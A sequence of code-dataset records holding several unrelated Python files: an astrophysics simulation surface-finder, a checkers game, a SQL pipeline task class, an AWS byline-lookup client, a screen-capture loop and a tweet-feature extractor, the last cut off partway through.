Geen, June 2018\n'''\n\nfrom startup import *\n\nfrom pymses.filters import CellsToPoints\nfrom pymses.utils import constants as C\nfrom pymses.analysis import sample_points\nfrom scipy.spatial import ConvexHull\n\ndef findsurface(snap,criterion=\"wind\"):\n    # Functions to determine which cells are in the surface\n    def findwind(dset):\n        temp = dset[\"P\"]/dset[\"rho\"]*snap.info[\"unit_temperature\"].express(C.K) \n        return temp > 1e5\n    def findHII(dset):\n        return dset[\"xHII\"] > 0.1\n    # Get the cells\n    amr = 
snap.amr_source([\"rho\",\"P\",\"xHII\",\"vel\"])\n cell_source = CellsToPoints(amr)\n cells = cell_source.flatten()\n mask = []\n if criterion == \"wind\":\n mask = findwind(cells)\n # Check if there are actually cells\n if len(mask) == 0:\n return None\n # Find surface\n points = cells.points\n return cells\n hull = ConvexHull(points[mask,:])\n # This is a list of indices of points on the surface\n surface = points[hull.vertices,:]\n # Can't be bothered to reverse mask to find the original list, so do this the longish way\n surfcells = sample_points(amr, surface)\n return surfcells\n\n\nif __name__==\"__main__\":\n sim = hamusims[\"IMF2_04\"]\n snap = sim.Snapshots()[39] # Get a random output with an evolved bubble\n surf = findsurface(snap.RawData(),\"wind\")\n import pdb; pdb.set_trace()\n","sub_path":"AMUN/scripts/surfacefinder.py","file_name":"surfacefinder.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331574432","text":"###\n#\n# Two-player checkers\n# Jacob Maibach, 2017\n#\n###\n\n#\n# To do list / reminders\n#\n# 1. debug (exception - InvalidMove in BoardState.remove_piece)\n# 4. implement interface for AI (no need to use coroutines - just use objects)\n# 5. implement user interface / implement graphics\n#\n# Issues\n#\n# 1. saving board entries as strings is inoptimal (see BoardState.get_pieces)\n#\n\nfrom abc import ABC,abstractmethod # abstract base classes\nfrom random import randint\n\n### exceptions\n\nclass InvalidMove(Exception):\n pass\n\n### board\n\nclass BoardState:\n piece_colors = [' ','R','RK','BK','B'] # use +1,-1 for R,B and +2,-2 for RK,BK\n empty = 0\n orientation = {'R':+1,'B':-1}\n \n def __init__(self,size,state = 'standard'):\n if(state == 'standard'):\n self.state = BoardState.standard_state(size)\n else:\n self.state = state\n self.size = size\n self.color_lookup = {BoardState.piece_colors[i]:i for i in range(len(BoardState.piece_colors))}\n \n def set_entry(self,i,j,val):\n self.state[i][j] = BoardState.piece_colors[val]\n \n def get_entry(self,i,j):\n color = self.state[i][j]\n index = self.color_lookup[color]\n return index\n\n def standard_state(size):\n '''\n Generates a standard starting board state.\n '''\n state = [[0 for j in range(size)] for i in range(size)]\n back = size//2\n front = back - 1 \n for i in range(size):\n for j in range(size): # this encoding strategy is bad\n if((i + j) % 2 == 0):\n state[i][j] = BoardState.piece_colors[0] # empty\n elif(i < front):\n state[i][j] = BoardState.piece_colors[+1] # red\n elif(i > back):\n state[i][j] = BoardState.piece_colors[-1] # black\n else:\n state[i][j] = BoardState.piece_colors[0] # empty\n return state\n\n def does_location_exist(self,loc):\n '''\n Checks if the location is on the board.\n Returns a boolean.\n '''\n if(loc[0] < 0 or loc[0] >= self.size):\n return False\n elif(loc[1] < 0 or loc[1] >= self.size):\n return False\n else:\n return(isinstance(loc[0],int) and isinstance(loc[1],int))\n \n def is_location_empty(self,loc):\n '''\n Checks if the location is not occupied by a piece.\n Returns a boolean.\n '''\n return self.get_entry(*loc) == self.empty\n\n def move(self,start_loc,end_loc):\n '''\n Moves piece at one location to another.\n Does not validate move.\n '''\n piece = self.get_entry(*start_loc)\n self.remove_piece(start_loc)\n self.set_entry(end_loc[0],end_loc[1],piece)\n\n def remove_piece(self,loc):\n '''\n Removes the piece at the given location,\n checking that the 
location is not empty.\n '''\n if(self.is_location_empty(loc)):\n raise InvalidMove('no piece at that location')\n else:\n self.set_entry(loc[0],loc[1],self.empty)\n\n def get_pieces(self):\n '''\n Returns the sequence of pieces on the board,\n ordered left to right and down.\n '''\n col = [self.piece_colors[1],self.piece_colors[-1]]\n convert = [None,(col[0],False),(col[0],True),(col[1],False),(col[1],True)]\n \n out = []\n for i in range(self.size):\n for j in range(self.size):\n entry = self.get_entry(i,j)\n if(entry != self.empty):\n loc = (i,j)\n (color,promoted) = convert[entry]\n piece = Piece(loc,color,promoted)\n out.append(piece)\n return out\n \n \nclass Board(BoardState):\n## def __init__(self,size,initial = 'auto'):\n## if(size % 2 == 1):\n## raise ValueError('size must be even')\n## if(initial == 'auto'):\n## self.state = BoardState(size)\n## else:\n## raise NotImplementedError('non-standard initial states not implemented')\n\n def view(self,fast = True):\n if(fast):\n for x in self.state:\n print(x)\n else:\n raise NotImplementedError\n\n def update_state(self,piece,move):\n '''\n Changes the board state to move the piece as directed.\n Does not check validity of the move.\n '''\n \n start_loc = piece.loc\n end_loc = move.get_end_location(start_loc)\n self.move(start_loc,end_loc)\n piece.loc = end_loc\n\n def has_jump(self,piece):\n '''\n Checks if the piece has a jump move open.\n Used to check for multiple-move turns.\n '''\n valid_moves = self.get_valid_moves(piece)\n return any(m.jump for m in valid_moves)\n\n def is_valid(self,piece,move):\n '''\n Checks if the given move is valid (if end location exists and is empty).\n Returns a boolean.\n '''\n start_loc = piece.location\n end_loc = move.get_end_location(start_loc)\n return self.does_location_exist(end_loc) and self.is_location_empty(end_loc)\n\n def get_valid_moves(self,piece):\n '''\n Returns the list of valid moves for the given piece.\n '''\n if(piece.promoted):\n directions = [(+1,+1),(-1,-1),(-1,+1),(+1,-1)]\n else:\n forward = self.orientation[piece.color]\n directions = [(+1,forward),(-1,forward)]\n out = []\n for direction in directions:\n regular_move = Move(direction,jump = False)\n jump_move = Move(direction,jump = True)\n \n if(self.is_valid(piece,regular_move)):\n out.append(regular_move)\n elif(self.is_valid(piece,jump_move)):\n out.append(jump_move)\n \n # inefficient: should check out-of-bounds separately from jump\n return out\n\n def count_pieces(self,include_promotion = False):\n '''\n Counts the number of each type of piece.\n '''\n count = [0,0,0,0,0]\n for i in range(self.size):\n for j in range(self.size):\n entry = self.get_entry(i,j)\n count[entry] += 1\n if(include_promotion):\n out = {self.piece_colors[i]:count[i] for i in range(1,len(self.piece_colors))}\n return out\n else:\n temp = {self.piece_colors[i]:count[i] for i in range(1,len(self.piece_colors))}\n R = [self.piece_colors[1],self.piece_colors[2]]\n B = [self.piece_colors[-1],self.piece_colors[-2]]\n return {self.piece_colors[1]:sum(temp[i] for i in R), self.piece_colors[-1]:sum(temp[i] for i in B)}\n\n### sub-board objects\n\nclass Move:\n def __init__(self,direction,jump = False):\n '''\n Direction may be one of the following: (+1,+1),(-1,-1),(-1,+1),(+1,-1)\n The first component indicates left-right (-1/+1) direction and the second forward-backward (+1/-1).\n '''\n self.right = direction[0] # +- 1\n self.forward = direction[1]\n self.jump = jump\n self._string_ = 'Move(direction = {0},jump = 
{1})'.format((self.right,self.forward),self.jump)\n\n    def __str__(self):\n        return self._string_\n\n    def get_end_location(self,start_loc):\n        '''\n        Given a starting location for the move, determines where it should end (may be invalid).\n        '''\n        loc = start_loc[:]\n        if(self.jump):\n            scale = 2\n        else:\n            scale = 1\n        loc[0] += scale*self.right\n        loc[1] += scale*self.forward\n        return loc\n\n    @property\n    def direction(self):\n        # same (right, forward) order as the constructor argument\n        return (self.right,self.forward)\n\n\nclass Piece:\n    def __init__(self,location,color,is_promoted = False):\n        self.loc = list(location)\n        self.color = color\n        self.promoted = is_promoted\n\n    @property\n    def location(self):\n        return self.loc\n\n\n### user interfaces\n\nclass Player(ABC):\n    @abstractmethod\n    def prompt(self,board,piece = None):\n        '''\n        Prompts the player to make a move.\n        If the input piece is given, the player will be restricted to moving that piece (useful for jumps). \n        '''\n        pass\n\n    @abstractmethod\n    def end(self,victory):\n        '''\n        Informs the player of their victory, or lack thereof.\n        Used either to control graphic interface or to reward AI.\n        '''\n        pass\n\nclass HumanPlayer(Player):\n    def __init__(self,name = None):\n        self.name = name\n    \n    def prompt(self,board,color,piece = None):\n        raise NotImplementedError\n\n    def end(self,victory):\n        raise NotImplementedError\n\nclass AI_Player(Player):\n    def __init__(self,color,AI,name = None):\n        self.name = name\n        self.color = color\n        self.AI = AI\n    \n    def prompt(self,board,color,piece = None):\n        raise NotImplementedError\n\n    def end(self,victory):\n        raise NotImplementedError\n\nclass RandomPlayer(Player):\n    def __init__(self,name = None):\n        self.name = name\n\n    def prompt(self,board,color,piece = None):\n        if(piece is not None):\n            possible_moves = board.get_valid_moves(piece)\n            choice = randint(0,len(possible_moves) - 1)\n            move = possible_moves[choice]\n        else:\n            number_possible_moves = 0\n            while(number_possible_moves == 0):\n                possible_pieces = [p for p in board.get_pieces() if p.color == color]\n                assert(len(possible_pieces) != 0)\n                choice = randint(0,len(possible_pieces)-1)\n                piece = possible_pieces[choice]\n                possible_moves = board.get_valid_moves(piece)\n                number_possible_moves = len(possible_moves)\n            choice = randint(0,number_possible_moves - 1)\n            move = possible_moves[choice]\n        return(piece,move)\n\n    def end(self,victory):\n        pass\n\nclass AdminPlayer(Player):\n    def __init__(self,name = None):\n        self.name = name\n    \n    def prompt(self,board,color,piece = None):\n        move = None\n        board.view(fast = True)\n        if(piece is not None):\n            valid_moves = board.get_valid_moves(piece)\n        if(piece is None):\n            valid_pieces = [p for p in board.get_pieces() if p.color == color]\n            print(\"Pieces:\")\n            for i,p in enumerate(valid_pieces):\n                print(\"{k}:{loc}\".format(k = i+1, loc = p.location))\n            while(piece is None):\n                try:\n                    choice = int(input(\"Choose a piece to move: \"))\n                except ValueError:\n                    print(\"Enter the number of the piece.\")\n                    continue\n                if(1 <= choice <= len(valid_pieces)):\n                    piece = valid_pieces[choice - 1]\n                    valid_moves = board.get_valid_moves(piece)\n                    if(len(valid_moves) == 0):\n                        piece = None\n                        print(\"No valid moves for this piece.\")\n                else:\n                    print(\"Invalid piece number.\")\n        while(move is None):\n            print(\"Moves:\")\n            for i,m in enumerate(valid_moves):\n                print(\"{k}:{direc}\".format(k = i+1, direc = m.direction))\n            while(True):\n                try:\n                    choice = int(input(\"Choose a move: \"))\n                except ValueError:\n                    print(\"Enter the number of the move.\")\n                    continue\n                if(1 <= choice <= len(valid_moves)):\n                    move = valid_moves[choice-1]\n                    break\n                else:\n                    
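# out-of-range choice; the enclosing while loop re-prompts\n                    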
print(\"Invalid move number.\")\n return(piece,move)\n\n def end(self,victory):\n print(\"Game ended.\")\n\n### main\n\nclass Game:\n '''\n Implements the game system:\n 1. turn management\n 2. board and move management\n 3. interaction between player interfaces and backend\n '''\n def __init__(self,player_1,player_2,size = 8,turn_order = ('B','R')):\n self.players = [player_1,player_2]\n self.board_size = size\n self.board = Board(size)\n self.turn_count = 0\n self.turn_order = turn_order\n\n def next_turn(self):\n color = self.turn_order[self.turn_count % 2]\n player = self.players[self.turn_count % 2]\n moving = True\n piece = None\n while(moving):\n piece,move = player.prompt(self.board,color,piece = piece)\n if(move == 'Draw'):\n self.end(victory = False)\n break\n self.board.update_state(piece,move)\n moving = self.board.has_jump(piece)\n self.turn_count += 1\n\n def run(self):\n board_counts = {self.board.piece_colors[1]:1,self.board.piece_colors[-1]:1} # inaccurate\n while(0 not in board_counts.values()):\n self.next_turn()\n board_counts = self.board.count_pieces(include_promotion = False)\n self.end(victory = True)\n\n def end(self,victory):\n '''\n Initiates the end step of the game.\n '''\n if(victory):\n victor = self.turn_count % 2\n self.players[victor].end(victory = True)\n self.players[not victor].end(victory = False)\n else:\n self.players[0].end(victory = None)\n self.players[1].end(victory = None)\n\n### output types\n\n##class StateVector:\n## king_value = 2\n## pass\n\ndef get_output_statelist(boardstate):\n '''\n Represents entries as characters and not numbers.\n '''\n # -K, -1, 0, +1, +K\n out = []\n for row in boardstate.state:\n out.extend(row)\n return out\n\nclass GameSeq:\n '''\n Records the sequence of moves of a game in a compact format.\n '''\n def __init__(self,seq = None,compressed = False):\n if(seq is None):\n self.seq = []\n else:\n self.seq = seq\n self.compressed = compressed\n\n def add_next(self,piece,move,boardstate):\n '''\n Adds the details of the next move to the GameSeq object.\n '''\n if(not self.compressed):\n new = piece.loc + (move.right,move.forward,int(move.jump))\n elif(self.compressed == \"index\"):\n for i,p in enumerate(boardstate.get_pieces()):\n if(p == piece):\n index = i\n break\n new = (index,move.right,move.forward,int(move.jump))\n else:\n raise NotImplementedError\n self.seq.append(new)\n \nif __name__ == '__main__':\n p1 = AdminPlayer()\n p2 = RandomPlayer()\n g = Game(p1,p2)\n g.run()\n","sub_path":"checkers_game.py","file_name":"checkers_game.py","file_ext":"py","file_size_in_byte":14722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349803821","text":"lista=list()\r\nfhand=open('romeo.txt')\r\nfor line in fhand:\r\n line=line.rstrip()\r\n wordlista=line.split()\r\n for word in wordlista:\r\n if word in lista:\r\n continue\r\n else:\r\n lista=lista.append(word)\r\n \r\n","sub_path":"test may 7.py","file_name":"test may 7.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408678823","text":"from sqlalchemy import or_, select\n\nfrom ..core.errors import Err, Exc, Ok\nfrom . 
import Task\n\n\nclass BaseSqlTask(Task):\n target_table_exists = None\n _target_db = None\n\n @property\n def target_db(self):\n return self.connections[self._target_db]\n\n def run(self):\n return self.execute_steps()\n\n def compile(self):\n return self.execute_steps()\n\n def execute_steps(self):\n # For incremental loads, manipulate the \"Merge\" steps depending on whether\n # the target table exists or not. This is done so we can delay the introspection\n if \"Merge\" in self.steps:\n self.target_table_exists = self.target_db._table_exists(\n self.table, self.schema\n )\n\n if not self.target_table_exists:\n tmp = self.steps[self.steps.index(\"Merge\") + 1 :]\n self.steps = self.steps[: self.steps.index(\"Merge\")]\n\n cols_no_type = [c for c in self.ddl[\"columns\"] if c[\"type\"] is None]\n if len(self.ddl[\"indexes\"]) > 0 or (\n len(self.ddl[\"primary_key\"]) > 0\n and len(self.ddl[\"columns\"]) > 0\n and len(cols_no_type) > 0\n ):\n self.steps.append(\"Create Indexes\")\n self.steps.extend([\"Cleanup Target\", \"Move\"])\n\n self.steps.extend(tmp)\n else:\n self.steps.append(\"Cleanup\")\n\n self.set_run_steps(self.steps)\n\n for step in self.steps:\n with self.step(step):\n result = self.execute_step(step)\n if result.is_err:\n return result\n\n return Ok()\n\n def execute_step(self, step):\n execute = self.run_arguments[\"command\"] == \"run\"\n\n get_query_steps = {\n \"Create Temp\": lambda: self.create_select(\n self.tmp_table, self.tmp_schema, self.sql_query, self.ddl\n ),\n \"Create Temp DDL\": lambda: self.target_db._create_table_ddl(\n self.tmp_table, self.tmp_schema, self.ddl\n ),\n \"Create View\": lambda: self.target_db._create_table_select(\n self.table, self.schema, self.sql_query, view=True\n ),\n \"Create Indexes\": lambda: self.create_indexes(\n self.tmp_table, self.tmp_schema, self.ddl\n ),\n \"Merge\": lambda: self.target_db._merge_tables(\n self.tmp_table,\n self.tmp_schema,\n self.table,\n self.schema,\n self.delete_key,\n ),\n \"Move\": lambda: self.target_db._move_table(\n self.tmp_table, self.tmp_schema, self.table, self.schema, self.ddl,\n ),\n \"Grant Permissions\": lambda: self.target_db.grant_permissions(\n self.table, self.schema, self.ddl[\"permissions\"]\n ),\n }\n\n if step in get_query_steps:\n # These steps are always: 1. Get the query, 2. Save to disk, 3. 
Execute\n # For more complex steps, there are specific entries in this if construct\n query = get_query_steps[step]()\n if self.run_arguments[\"debug\"]:\n self.write_compilation_output(query, step.replace(\" \", \"_\").lower())\n if execute:\n try:\n self.target_db.execute(query)\n except Exception as e:\n return Exc(e)\n\n return Ok()\n\n elif step == \"Write Query\":\n return self.write_compilation_output(self.sql_query, \"select\")\n\n elif step == \"Execute Query\":\n if execute:\n try:\n self.target_db.execute(self.sql_query)\n except Exception as e:\n return Exc(e)\n\n return Ok()\n\n elif step == \"Cleanup\":\n result = self.cleanup(self.tmp_table, self.tmp_schema, step, execute)\n if result.is_err:\n return result\n\n return Ok()\n\n elif step == \"Cleanup Target\":\n result = self.cleanup(self.table, self.schema, step, execute)\n if result.is_err:\n return result\n\n return Ok()\n\n elif step == \"Load Data\":\n try:\n self.load_data(\n self.source_table_def,\n self.source_db,\n self.table,\n self.schema,\n self.tmp_table,\n self.tmp_schema,\n self.incremental_key,\n self.ddl,\n execute,\n )\n except Exception as e:\n return Exc(e)\n\n return Ok()\n\n else:\n return Err(\"task_execution\", \"unknown_step\", step=step)\n\n # SQL execution steps methods\n\n def create_select(self, table, schema, select, ddl):\n out_sql = list()\n\n cols_no_type = [c for c in self.ddl[\"columns\"] if c[\"type\"] is None]\n if len(ddl.get(\"columns\")) == 0 or len(cols_no_type) > 0:\n out_sql.append(\n self.target_db._create_table_select(\n table, schema, select, view=False, ddl=self.ddl\n )\n )\n else:\n # create table with DDL and insert the output of the select\n out_sql.append(self.target_db._create_table_ddl(table, schema, ddl))\n\n ddl_column_names = [c[\"name\"] for c in ddl.get(\"columns\")]\n out_sql.append(\n self.target_db._insert(table, schema, select, columns=ddl_column_names)\n )\n\n return \"\\n\".join(out_sql)\n\n def create_indexes(self, tmp_table, tmp_schema, ddl):\n cols_no_type = [c for c in self.ddl[\"columns\"] if c[\"type\"] is None]\n if not (len(ddl.get(\"columns\")) == 0 or len(cols_no_type) > 0):\n # Based on create_select: this condition means we're issuing a\n # create_table_ddl, in which case we don't need an alter to\n # add the primary key\n ddl = {k: v if k != \"primary_key\" else dict() for k, v in ddl.items()}\n\n return self.target_db._create_indexes(tmp_table, tmp_schema, ddl)\n\n def cleanup(self, table, schema, step, execute):\n out_sql = list()\n\n # using those flags to capture error here. Not sure how to best capture a genuine error fail (e.g. permissions). 
To investigate.\n        cleanup_table_failed = False\n        cleanup_view_failed = False\n\n        try:\n            out_sql.append(\n                self.target_db._drop_table(table, schema, view=False, execute=execute)\n            )\n        except Exception:\n            cleanup_table_failed = True\n\n        try:\n            out_sql.append(\n                self.target_db._drop_table(table, schema, view=True, execute=execute)\n            )\n        except Exception:\n            cleanup_view_failed = True\n\n        query = \"\\n\".join(out_sql)\n        if self.run_arguments[\"debug\"]:\n            self.write_compilation_output(query, step.replace(\" \", \"_\").lower())\n\n        if cleanup_table_failed and cleanup_view_failed:\n            return Err(\"task_step\", step, table=table, schema=schema)\n        else:\n            return Ok()\n\n    def load_data(\n        self,\n        source_table_def,\n        source_db,\n        table,\n        schema,\n        tmp_table,\n        tmp_schema,\n        incremental_key,\n        ddl,\n        execute,\n    ):\n        # Get the incremental value\n\n        last_incremental_value_query = (\n            f\"SELECT MAX({incremental_key}) AS value\\n\"\n            f\"FROM {'' if schema is None else schema +'.'}{table}\\n\"\n            f\"WHERE {incremental_key} IS NOT NULL\"\n        )\n        if self.run_arguments[\"debug\"]:\n            self.write_compilation_output(\n                last_incremental_value_query, \"last_incremental_value\"\n            )\n\n        get_data_query = select([source_table_def.c[c[\"name\"]] for c in ddl[\"columns\"]])\n        last_incremental_value = None\n\n        if not self.is_full_load and self.target_table_exists:\n            if execute:\n                res = self.target_db.read_data(last_incremental_value_query)\n                if len(res) == 1:\n                    last_incremental_value = res[0][\"value\"]\n            else:\n                last_incremental_value = \"LAST_INCREMENTAL_VALUE\"\n\n        # Select stream\n        if last_incremental_value is not None:\n            get_data_query = get_data_query.where(\n                or_(\n                    source_table_def.c[incremental_key].is_(None),\n                    source_table_def.c[incremental_key] > last_incremental_value,\n                )\n            )\n        if self.run_arguments[\"debug\"]:\n            self.write_compilation_output(get_data_query, \"get_data\")\n\n        if execute:\n            data_iter = source_db._read_data_stream(get_data_query)\n            return self.target_db.load_data(tmp_table, data_iter, schema=tmp_schema)\n        else:\n            return Ok()\n","sub_path":"sayn/tasks/base_sql.py","file_name":"base_sql.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303993122","text":"\"\"\"\nCreated on 1 Aug 2023\n\n@author: Bruno Beloff (bruno.beloff@southcoastscience.com)\n\nEquivalent to cURLs:\ncurl \"https://aws.southcoastscience.com/device-topics?topic=south-coast-science-dev/alphasense/loc/303/gases\"\ncurl \"https://aws.southcoastscience.com/device-topics?device=scs-bgx-303\"\n\"\"\"\n\nimport requests\n\nfrom collections import OrderedDict\nfrom urllib.parse import parse_qs, urlparse\n\nfrom scs_core.aws.client.api_client import APIClient, APIResponse\nfrom scs_core.aws.data.byline import Byline, DeviceBylineGroup, TopicBylineGroup\n\nfrom scs_core.data.str import Str\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass BylineFinder(APIClient):\n    \"\"\"\n    classdocs\n    \"\"\"\n\n    __URL = 'https://k5uz49605m.execute-api.us-west-2.amazonaws.com/default/TopicBylines'\n\n    __DEVICE = 'device'\n    __TOPIC = 'topic'\n\n\n    # ----------------------------------------------------------------------------------------------------------------\n\n    def __init__(self, reporter=None):\n        super().__init__(reporter=reporter)\n\n\n    # ----------------------------------------------------------------------------------------------------------------\n\n    def find_latest_byline_for_topic(self, 
token, topic):\n params = {self.__TOPIC: topic}\n\n response = requests.get(self.__URL, headers=self._token_headers(token), params=params)\n jdict = response.json()\n\n # bylines...\n if jdict is None:\n return None\n\n latest_byline = None\n\n for item in jdict:\n byline = Byline.construct_from_jdict(item)\n\n if latest_byline is None or latest_byline.rec < byline.rec:\n latest_byline = byline\n\n return latest_byline\n\n\n def find_bylines(self, token, excluded=None, strict_tags=False):\n bylines = [item for item in self._get_blocks(self.__URL, token, BylineFinderResponse)]\n\n return TopicBylineGroup.construct(bylines, excluded=excluded, strict_tags=strict_tags)\n\n\n def find_bylines_for_topic(self, token, topic, excluded=None, strict_tags=False):\n params = {self.__TOPIC: topic}\n\n response = requests.get(self.__URL, headers=self._token_headers(token), params=params)\n self._check_response(response)\n\n jdict = response.json()\n\n # bylines...\n return TopicBylineGroup.construct_from_jdict(jdict, excluded=excluded, strict_tags=strict_tags, skeleton=True)\n\n\n def find_bylines_for_device(self, token, device, excluded=None):\n params = {self.__DEVICE: device}\n\n response = requests.get(self.__URL, headers=self._token_headers(token), params=params)\n self._check_response(response)\n\n jdict = response.json()\n\n # bylines...\n return DeviceBylineGroup.construct_from_jdict(jdict, excluded=excluded, skeleton=True)\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass DeviceBylineFinder(APIClient):\n \"\"\"\n classdocs\n \"\"\"\n\n __URL = 'https://k5uz49605m.execute-api.us-west-2.amazonaws.com/default/TopicBylines/self'\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __init__(self):\n super().__init__()\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def find_byline_for_topic(self, token, topic):\n response = requests.get(self.__URL, headers=self._token_headers(token))\n self._check_response(response)\n\n jdict = response.json()\n\n # bylines...\n if jdict is None:\n return None\n\n for item in jdict:\n byline = Byline.construct_from_jdict(item)\n\n if byline.topic == topic:\n return byline\n\n return None\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass BylineFinderResponse(APIResponse):\n \"\"\"\n classdocs\n \"\"\"\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @classmethod\n def construct_from_jdict(cls, jdict):\n if not jdict:\n return None\n\n items = []\n if jdict.get('Items'):\n for item_jdict in jdict.get('Items'):\n item = Byline.construct_from_jdict(item_jdict)\n items.append(item)\n\n next_url = jdict.get('next')\n\n return cls(items, next_url=next_url)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __init__(self, items, next_url=None):\n \"\"\"\n Constructor\n \"\"\"\n self.__items = items # list of Byline\n self.__next_url = next_url # URL string\n\n\n def __len__(self):\n return len(self.items)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def next_params(self, _):\n return parse_qs(urlparse(self.next_url).query)\n\n\n # 
----------------------------------------------------------------------------------------------------------------\n\n def as_json(self):\n jdict = OrderedDict()\n\n if self.items is not None:\n jdict['Items'] = self.items\n jdict['itemCount'] = len(self.items)\n\n if self.next_url is not None:\n jdict['next'] = self.next_url\n\n return jdict\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def items(self):\n return self.__items\n\n\n @property\n def next_url(self):\n return self.__next_url\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __str__(self, *args, **kwargs):\n return \"BylineFinderResponse:{items:%s, next_url:%s}\" % (Str.collection(self.items), self.next_url)\n","sub_path":"src/scs_core/aws/manager/byline_finder.py","file_name":"byline_finder.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"485616133","text":"import numpy as np\nimport cv2\nimport mss\nimport time\n##\n##sct = mss.mss()\n##screen = {\"left\":0,\"top\":0,\"width\":200,\"height\":200}\n##while(True):\n## img = np.asarray(sct.grab(screen))\n## gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n## cv2.imshow(\"imgs\",img)\n\n \ndef screen_record_efficient():\n # 800x600 windowed mode\n mon = {\"top\":800 , \"left\": 1000, \"width\": 200, \"height\": 200}\n\n title = \"[MSS] FPS benchmark\"\n sct = mss.mss()\n \n\n while (True):\n img = np.asarray(sct.grab(mon))\n\n cv2.imshow(title, img)\n if cv2.waitKey(25) & 0xFF == ord(\"q\"):\n cv2.destroyAllWindows()\n break\n sct.close()\nscreen_record_efficient()\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200011142","text":"import re\r\nimport csv\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport numpy as np\r\ndef Dictionary():\r\n d={}\r\n with open(\"affective_lexicon.tsv\",\"r\",encoding=\"utf8\") as f:\r\n next(f)\r\n reader = csv.reader(f,delimiter='\\t')\r\n for line in reader:\r\n key = line[0]\r\n value= line[1]\r\n d[key]= value\r\n\r\n return d\r\n\r\nlexicon = Dictionary()\r\n\r\n\r\ndef extract_tweet_sentiments(fname): #we return whichever features we want\r\n def mean(numbers):\r\n return float(sum((list(map(float,numbers))))) / max(len(numbers), 1)\r\n\r\n\r\n def num_tweets(f_name):\r\n i = 0\r\n with open(f_name) as f:\r\n for line in f:\r\n i+=1 # number of lines\r\n return i;\r\n\r\n tweet_num = (num_tweets(fname));\r\n\r\n def word_number(f_name):\r\n with open(f_name) as f:\r\n j = 0\r\n for line in f:\r\n for word in line.split():\r\n j+=1\r\n return j\r\n\r\n tweet_word_number = word_number(fname)\r\n\r\n tweet_words =[[] for _ in range(tweet_num)]\r\n def word_append(f_name):\r\n with open(f_name) as f:\r\n i = 0\r\n for line in f:\r\n for word in line.split():\r\n tweet_words[i].append(word)\r\n i+=1\r\n return 0\r\n\r\n word_append(fname)\r\n\r\n def emoj_finder(f_name):\r\n eyes, noses, happy = r\":;8BX=\", r\"-~'^\", r\")DP\"\r\n neutral = r\"|\"\r\n sad = r\"(/\\ \"\r\n\r\n list =[[] for _ in range(tweet_num)] # i is #tweets and j = 0 #happy, 1 = #neutral , 2 #sad\r\n\r\n pattern0 = \"[%s][%s]?[%s]\" % tuple(map(re.escape, [eyes, noses, happy])) # happy pattern\r\n pattern1 = 
\"[%s][%s]?[%s]\" % tuple(map(re.escape, [eyes, noses, neutral])) #neutral pattern\r\n pattern2 = \"[%s][%s]?[%s]\" % tuple(map(re.escape, [eyes, noses, sad])) #sad pattern\r\n i = 0\r\n with open(f_name) as f:\r\n for line in f:\r\n if(len(re.findall(pattern0, line)) != 0) :\r\n list[i].append(len(re.findall(pattern0, line))/len(tweet_words[i]))\r\n if(len(re.findall(pattern0, line)) != 0) :\r\n list[i].append(len(re.findall(pattern0, line))/len(tweet_words[i]))\r\n if(len(re.findall(pattern0, line)) != 0) :\r\n list[i].append(len(re.findall(pattern0, line))/len(tweet_words[i]))\r\n\r\n i+=1 # number of lines\r\n #print(list)\r\n return list\r\n\r\n tweet_emjs = emoj_finder(fname)\r\n\r\n def punctuation_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[.?\\-!\",]+'\r\n with open(fname) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])#punctuation\r\n i+=1\r\n return list\r\n\r\n tweet_punct=punctuation_finder(fname)\r\n\r\n def all_upper_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[A-Z]+'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])#all upper\r\n i+=1\r\n return list\r\n\r\n tweet_upper = all_upper_finder(fname)\r\n\r\n def hashtag_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[#]+'#r'?<=^|(?<=[^a-zA-Z0-9-_\\.]))#([A-Za-z]+[A-Za-z0-9]+'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])\r\n i+=1\r\n return list\r\n\r\n tweet_hashes = hashtag_finder(fname)\r\n\r\n def rep_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'(\\w)\\1*?'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])\r\n i+=1\r\n return list\r\n\r\n tweet_reps = rep_finder(fname)\r\n\r\n\r\n def url_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\r\n with open(fname) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])\r\n 